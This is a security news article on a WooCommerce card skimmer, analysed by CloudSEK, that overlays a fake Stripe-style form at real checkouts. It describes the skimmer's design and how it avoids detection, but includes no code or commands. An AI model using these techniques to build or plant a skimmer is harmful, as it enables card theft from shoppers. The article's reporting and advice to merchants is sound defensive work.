WooCommerce Payment Skimmer Mimics Stripe to Steal Cards at Real Checkouts

Cybercriminals have changed tactics, and online shoppers are paying the price. A newly analyzed WooCommerce payment skimmer hides inside real store checkouts and quietly lifts card details during genuine purchases. Threat intelligence firm CloudSEK dissected one such sample, and the findings are a wake-up call for merchants.

From fake pages to real checkouts

For years, card thieves relied on phishing. They built fake bank logins, loan portals, and parcel lures to trick victims into typing card numbers. However, CloudSEK reports that the more skilled actors have largely abandoned that model.

Instead, they now compromise legitimate e-commerce sites directly. This is the Magecart approach, where attackers inject JavaScript skimmers into trusted stores. According to CloudSEK, the skimmer “silently steals card details during genuine payments.”

The advantage is obvious. The victim sits on a real store, with a valid certificate and a familiar brand. As a result, there is nothing suspicious to spot.

Inside the skimmer

The sample targets WooCommerce stores running WooCommerce Payments with Stripe. Notably, it stays dormant until it detects the Stripe payment element on a checkout page. Then it springs to life.

Rather than reading Stripe’s protected iframe, the WooCommerce payment skimmer builds its own fake form. It overlays a look-alike payment box styled to match Stripe’s fields. Because those fake fields are first-party elements, the attacker’s script can read every keystroke.

The skimmer captures the card number, expiry, CVV, and customer email. Therefore, attackers gain the complete “Fullz” package that sells at a premium on carding marketplaces.

Built to feel legitimate

The most striking part is how convincing the fake form feels. The skimmer re-implements the same checks a real checkout runs. For example, it detects the card brand, runs a Luhn checksum, and validates the expiry date.

Consequently, the victim sees friendly inline errors and correct formatting while typing. Nothing on screen hints at the theft. The payment still completes normally, so neither shopper nor merchant notices a thing.

Hiding in plain sight

This WooCommerce payment skimmer also disguises its footprint. It stores data under keys that mimic marketing pixels. Moreover, it sets a Google Analytics opt-out flag to suppress tracking around the injected form.

It even deduplicates victims to keep outbound traffic quiet. Stolen records are then encoded and beamed to an attacker-controlled endpoint. This encoding helps the theft blend into ordinary-looking web traffic and slip past simple detection rules.

Why it matters

The whole operation is built for stealth. Because the real purchase always succeeds, detection is hard. In fact, CloudSEK warns that “dwell time is often measured in months.”

The attack chain usually starts with a vulnerable plugin, weak admin credentials, or a known CMS flaw. From there, attackers plant a web shell and a checkout backdoor. Fresh, validated cards then flow to underground shops within days.

Merchants should act now. You can read the full CloudSEK analysis of the WooCommerce skimmer for indicators and remediation steps. Above all, treat any self-rolled encoding inside a checkout script as a red flag, since legitimate payment libraries never hide their own code.